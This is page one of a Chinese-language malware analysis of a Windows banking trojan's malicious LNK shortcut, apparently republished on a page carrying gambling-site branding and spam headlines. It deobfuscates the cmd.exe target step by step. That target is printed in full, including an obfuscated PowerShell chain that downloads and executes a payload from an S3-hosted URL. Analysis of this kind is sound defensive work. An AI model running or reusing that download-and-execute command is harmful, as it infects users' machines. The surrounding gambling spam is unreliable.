太阳集团2138备用网址

  • 防弹少年团金泰亨蓝发登各国热搜 玩儿转红粉金黑棕各种发色实力演绎“有颜任性”【组图】 2019-04-25
  • 龙烨为袁竹逍遥画派配画诗欣赏之三 2019-04-25
  • 因应增值税下调 多个豪车品牌在华降价 2019-04-25
  • “小屏论”话两会:“习语”暖人心 2019-04-25
  • 低价 贴心 保障 国美3.15,为消费者保驾护航低价贴心保障 国美315,为消费者保驾护航-国美 2019-04-25
  • 中央政治局同志向党中央和习近平总书记述职 2019-04-25
  • China Daily Website 2019-04-25
  • 【守护好我们的美丽家园】新疆的明天一定会更好 2019-04-25
  • 22年后紫霞仙子归来 可至尊宝已经不是他了 2019-04-25
  • 【独家V观】你好 意大利 2019-04-25
  • 合肥一文化公司人去楼空老板跑路 老人购买保健品被骗上万元 2019-04-25
  • 北京二手房交易实现一网通办 20分钟就办完 ——凤凰网房产北京 2019-04-25
  • NBA史上最牛的9大名帅 波波在这里只能排倒三 2019-04-25
  • 《阿丽塔》要和《流浪地球》抢票房 2019-04-24
  • 百城住宅均价环比涨幅持续收窄 变化大多在1%内 2019-04-24
  • 欢迎来到 黑吧太阳集团2138备用网址 是业内专业的游戏平台,为你提供各式各样的精品游戏,最全的游戏项目,同时还为您提供各种游戏专题游戏攻略人气论坛。

    见招拆招分析银行木马:揭开恶意LNK真面目+逐步拆解混淆后Dropper

    来源:本站整理 作者:佚名 时间:2019-02-24 TAG: 我要投稿

    太阳集团2138备用网址 www.r-island.com 一、概述
    在本文中,主要针对Windows的某银行恶意软件进行分析,我们集中分析该恶意软件的前两个阶段。第一阶段是Windows快捷方式文件(LNK文件),在运行快捷方式之后,将会投放PowerShell脚本(使用了ISESteriods进行模糊处理)并执行。我们对这一PowerShell文件进行了详细分析。
    大家可以在这里下载本文涉及的样本文件,其中也包括所有投放的文件。
    二、第一阶段:快捷方式
    在这一木马中,快捷方式使用了一个通用的图标,其目标指向Windows命令行cmd.exe。下面是该快捷方式指向的完整目标,请大家注意在该文本末尾存在的空格。
    C:\Windows\system32\cmd.exe /V /C set x4OAGWfxlES02z6NnUkK=2whttpr0&&set L1U03HmUO6B9IcurCNNlo4=.com&& echo | start %x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNNlo4%/br/flashplayer/
    我们将对其中的标志和变量进行分析,首先从标志开始。
    2.1 标志
    在这里,组合使用了标志/V和/C。在Windows Shell中,可以使用/?标志显示完整的使用说明。完整命令如下所示。
    cmd.exe /?
    在使用说明中,可以找到这两个标志的相关信息,如下所示。
    /C      Carries out the command specified by string and then terminates
    (执行字符串中指定的命令,然后终止。)
    /V:ON   Enable delayed environment variable expansion using ! as the
            delimiter. For example, /V:ON would allow !var! to expand the
            variable var at execution time.  The var syntax expands variables
            at input time, which is quite a different thing when inside of a FOR
            loop.
    (启用使用!走位分隔符的延迟环境变量扩展。例如:/V:ON将允许!var!在执行时扩展变量var。var语法在输入时扩展变量,这在FOR循环中是完全不同的。)
    在这里,需要注意由命令分隔符“&&”分隔的多个命令。
    在解析并执行命令行参数后,将终止已经启动的Shell。延迟的环境变量扩展允许对目标进行模糊处理,因为变量首先被设置,然后会被扩展。
    2.2 变量
    变量之间以百分号分隔,多个命令会使用两个符号来连接。关键字set用于声明变量并为其设置值。如下所示,命令将被拆分,从而使得每个命令都新起一行。
    set x4OAGWfxlES02z6NnUkK=2whttpr0
    &&
    set L1U03HmUO6B9IcurCNNlo4=.com
    &&
    echo | start %x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNNlo4%/br/flashplayer/
    前两个变量(x4OAGWfxlES02z6NnUkK和L1U03HmUO6B9IcurCNNlo4)用于在最后一行中启动新进程。其中的:~2,4部分(在最后一行x4OAGWfxlES02z6NnUkK后面)用于从索引2中选择长度为4的子字符串(包含起始索引)。在这种情况下,值2whttpr0将被转换为http。反混淆后的URL如下所示。
    · https://get.adobe.com/br/flashplayer/
    如果让用户使用默认Web浏览器打开Adobe Flash播放器的官方网站,这一行为本身并不是恶意的,这也意味着恶意软件会执行比这一行为更多的功能。在目标末尾的位置,附加的空格数量是奇数个,我们可以使用十六进制编辑器打开快捷方式。这表明,其实目标中还存在更多的内容,只是不能直接显示出来。
    2.3 点和空字节
    我们发现,文本中存在“点”符号,在十六进制编辑器中表示空字节。我们可以使用另一个不执行此操作的编辑器,或者使用文本中未出现的字符替换所有空字节。在这种情况下,我们使用了^符号。在复制数据后,所选字符可以替换为空,并显示出原始文本。
    2.4 完整的快捷方式目标
    我们使用十六进制编辑器,得到了如下结果。
    C:\Windows\system32\cmd.exe /V /C set x4OAGWfxlES02z6NnUkK=2whttpr0&&set L1U03HmUO6B9IcurCNNlo4=.com&& echo | start %x4OAGWfxlES02z6NnUkK:~2,4%s://get.adobe%L1U03HmUO6B9IcurCNNlo4%/br/flashplayer/                                                                                                                      &&set aZM4j3ZhPLBn9MpuxaO= -win 1 &&set MlyavWfE=ndows&&set jA8Axao1xcZ=iEx&&set WMkgA3uXa1pXx=tRi&&set KNhGmAqHG5=bJe&&set 4kxhaz6bqqKC=LOad&&set rwZCnSC7T=nop&&set jcCvC=NEw&&set ZTVZ=wEbc&&set DABThzRuTT2hYjVOy=nt).dow&&set cwdOsPOdA08SZaXVp1eFR=t NeT.&&set Rb=Ers&&set j4HfRAqYXcRZ3R=hEll&&set Kpl01SsXY5tthb1=.bmp&&set vh7q6Aq0zZVLclPm=\v1.0\&&set 2Mh=pOw&&set 8riacao=%x4OAGWfxlES02z6NnUkK:~2,4%s://s3-eu-west-1.amazonaws%L1U03HmUO6B9IcurCNNlo4%/juremasobra2/jureklarj934t9oi4%Kpl01SsXY5tthb1%&&@echo off && %SystemDrive% && cd\ && cd %SystemRoot%\System32 &&echo %jA8Axao1xcZ%("%jA8Axao1xcZ%(!jcCvC!-o%KNhGmAqHG5%c!cwdOsPOdA08SZaXVp1eFR!!ZTVZ!Lie!DABThzRuTT2hYjVOy!n%4kxhaz6bqqKC%S%WMkgA3uXa1pXx%NG('%x4OAGWfxlES02z6NnUkK:~2,4%s://s3-eu-west-1.amazonaws%L1U03HmUO6B9IcurCNNlo4%/juremasobra2/jureklarj934t9oi4%Kpl01SsXY5tthb1%')"); | Wi!MlyavWfE!!2Mh!!Rb!!j4HfRAqYXcRZ3R!!vh7q6Aq0zZVLclPm!!2Mh!!Rb!!j4HfRAqYXcRZ3R! -!rwZCnSC7T!!aZM4j3ZhPLBn9MpuxaO! --%ProgramFiles%\Internet Explorer\iexplore.exe

    [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]  下一页

    【声明】:太阳集团2138备用网址(http://www.r-island.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@www.r-island.com,我们会在最短的时间内进行处理。
    • 最新更新
      • 相关阅读
        • 本类热门
          • 最近下载